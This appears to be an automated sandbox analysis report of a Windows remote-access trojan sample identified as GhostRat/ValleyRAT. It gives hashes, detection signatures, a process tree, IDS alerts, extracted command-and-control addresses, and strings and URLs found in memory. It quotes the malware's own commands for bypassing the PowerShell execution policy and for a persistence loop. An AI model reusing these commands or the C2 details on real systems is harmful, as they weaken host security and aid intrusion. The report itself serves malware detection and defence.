
Windows Analysis Report
ErbgterT2R.exe

Overview

General Information

Sample name: ErbgterT2R.exe (renamed because the original name is a hash value)
Original sample name: 14DFEC5B51C4D87EACAB495AD216EB7C.exe
Analysis ID: 1584889
MD5: 14dfec5b51c4d87eacab495ad216eb7c
SHA1: fab7846b458694aecabf6770673615ae90493b5e
SHA256: b86af545e9a2f86c05538eb7fcb85cf63085a0730925a9587253d46590a4e4e9
Tags: exe, ValleyRAT, user-abuse_ch

Detection

GhostRat
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Loading BitLocker PowerShell Module
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Suspicious Program Location with Network Connections
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different from the original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ErbgterT2R.exe (PID: 7472 cmdline: "C:\Users\user\Desktop\ErbgterT2R.exe" MD5: 14DFEC5B51C4D87EACAB495AD216EB7C)
    • cmd.exe (PID: 7604 cmdline: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Update.exe (PID: 7652 cmdline: C:\Users\Public\Bilite\Axialis\Update.exe MD5: FB325C945A08D06FE91681179BDCCC66)
        • cmd.exe (PID: 4592 cmdline: cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 3756 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 2144 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 2840 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3452 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 5800 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 7804 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 3152 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 6504 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 4336 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
          • tasklist.exe (PID: 2724 cmdline: tasklist /FI "IMAGENAME eq Update.exe" MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 3964 cmdline: findstr /I "Update.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • timeout.exe (PID: 8008 cmdline: timeout /t 30 /nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • cmd.exe (PID: 6452 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7284 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 6036 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 7196 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
{"C2 url": ["134.122.155.39:15091", "134.122.155.39:15092"]}
Source | Rule | Description | Author | Strings
00000003.00000003.2585756688.00000000005E3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000003.00000003.2921881516.0000000004691000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000003.00000003.3251872110.0000000004691000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000003.00000002.3564033728.0000000003000000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
00000003.00000003.3080679847.0000000004691000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
(13 entries in total)

Source | Rule | Description | Author | Strings
3.3.Update.exe.469260b.6.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
3.2.Update.exe.30405bf.4.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
3.2.Update.exe.34e0000.6.raw.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
3.2.Update.exe.469260b.7.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
3.3.Update.exe.469260b.8.unpack | JoeSecurity_GhostRat | Yara detected GhostRat | Joe Security |
(29 entries in total)

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Bilite\Axialis\Update.exe, NewProcessName: C:\Users\Public\Bilite\Axialis\Update.exe, OriginalFileName: C:\Users\Public\Bilite\Axialis\Update.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7604, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ProcessId: 7652, ProcessName: Update.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\Public\Bilite\Axialis\Update.exe, ParentImage: C:\Users\Public\Bilite\Axialis\Update.exe, ParentProcessId: 7652, ParentProcessName: Update.exe, ProcessCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 6452, ProcessName: cmd.exe
Source: Network Connection; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: DestinationIp: 134.122.155.39, DestinationIsIpv6: false, DestinationPort: 18852, EventID: 3, Image: C:\Users\Public\Bilite\Axialis\Update.exe, Initiated: true, ProcessId: 7652, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49900
Source: Process started; Author: frack113; Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6036, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ProcessId: 7196, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6036, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1, ProcessId: 7196, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-06T17:48:56.323252+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49922 | 134.122.155.39 | 15091 | TCP
2025-01-06T17:50:05.766655+0100 | 2052875 | 1 | A Network Trojan was detected | 192.168.2.4 | 49940 | 134.122.155.39 | 15091 | TCP


AV Detection

Source: Update.exe.7652.3.memstrmin; Malware Configuration Extractor: GhostRat {"C2 url": ["134.122.155.39:15091", "134.122.155.39:15092"]}
Source: C:\Users\Public\Bilite\Axialis\Update.dll; ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\backup.dll; ReversingLabs: Detection: 47%
Source: ErbgterT2R.exe; ReversingLabs: Detection: 36%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.6% probability
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_6C376EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376EB0
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_6C376720 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyHash,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376720
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_6C376520 CryptStringToBinaryA,CryptStringToBinaryA,___std_exception_copy,3_2_6C376520
Source: ErbgterT2R.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2639809888.000000000785C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb77 source: powershell.exe, 00000012.00000002.2646019166.000000000899B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2641443881.000000000790F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\MFCLibrary_YSS\Release\Update.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp, Update.dll.0.dr
Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000012.00000002.2645678800.000000000896C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000012.00000002.2646365604.00000000089D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\agent\workspace\p-e3cf6c00cb1d4f41832c02872427999a\src\Ufo4WinMac\GamerUFO\ufo4Desktop\Output\bin\Release\UpdateApp.pdb((& source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000003.00000000.1811668541.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe, 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmp, Update.exe.0.dr, backup.exe.3.dr
Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: 360inst_install.exe.0.dr
Source: C:\Users\Public\Bilite\Axialis\Update.exe; File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: c:
Source: C:\Users\Public\Bilite\Axialis\Update.exe; File opened: [:
Source: C:\Users\user\Desktop\ErbgterT2R.exe; Code function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
Source: C:\Users\user\Desktop\ErbgterT2R.exe; Code function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_6C39F888 FindFirstFileExW,RevokeDragDrop,FindNextFileW,FindClose,FindClose,3_2_6C39F888
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_6C39F7D7 FindFirstFileExW,3_2_6C39F7D7
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_034E80F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_034E80F0

Networking

Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49922 -> 134.122.155.39:15091
Source: Network traffic; Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49940 -> 134.122.155.39:15091
Source: Malware configuration extractor; URLs: 134.122.155.39:15091
Source: Malware configuration extractor; URLs: 134.122.155.39:15092
Source: global traffic; TCP traffic: 134.122.155.39 ports 18852,15091,1,2,5,8
Source: global traffic; TCP traffic: 192.168.2.4:49900 -> 134.122.155.39:18852
Source: Joe Sandbox View; ASN Name: BCPL-SGBGPNETGlobalASNSG
Source: unknown; TCP traffic detected without corresponding DNS query: 134.122.155.39
Source: C:\Users\Public\Bilite\Axialis\Update.exe; Code function: 3_2_034E3360 recv,timeGetTime,_memmove,3_2_034E3360
Source: 360inst_install.exe.0.dr; String found in binary or memory: http://%s/gf/360ini.cabhttp://dl.360safe.com/gf/360ini.cab
Source: 360inst_install.exe.0.dr; String found in binary or memory: http://123.com/
Source: 360inst_install.exe.0.dr; String found in binary or memory: http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:
Source: 360inst_install.exe.0.dr; String found in binary or memory: http://360.cn
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr; String found in binary or memory: http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPA
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000012.00000002.2631490282.0000000003211000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2631914277.0000000002B6F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.dr; String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: backup.exe.3.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://hao.360.com
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab
                      Source: powershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
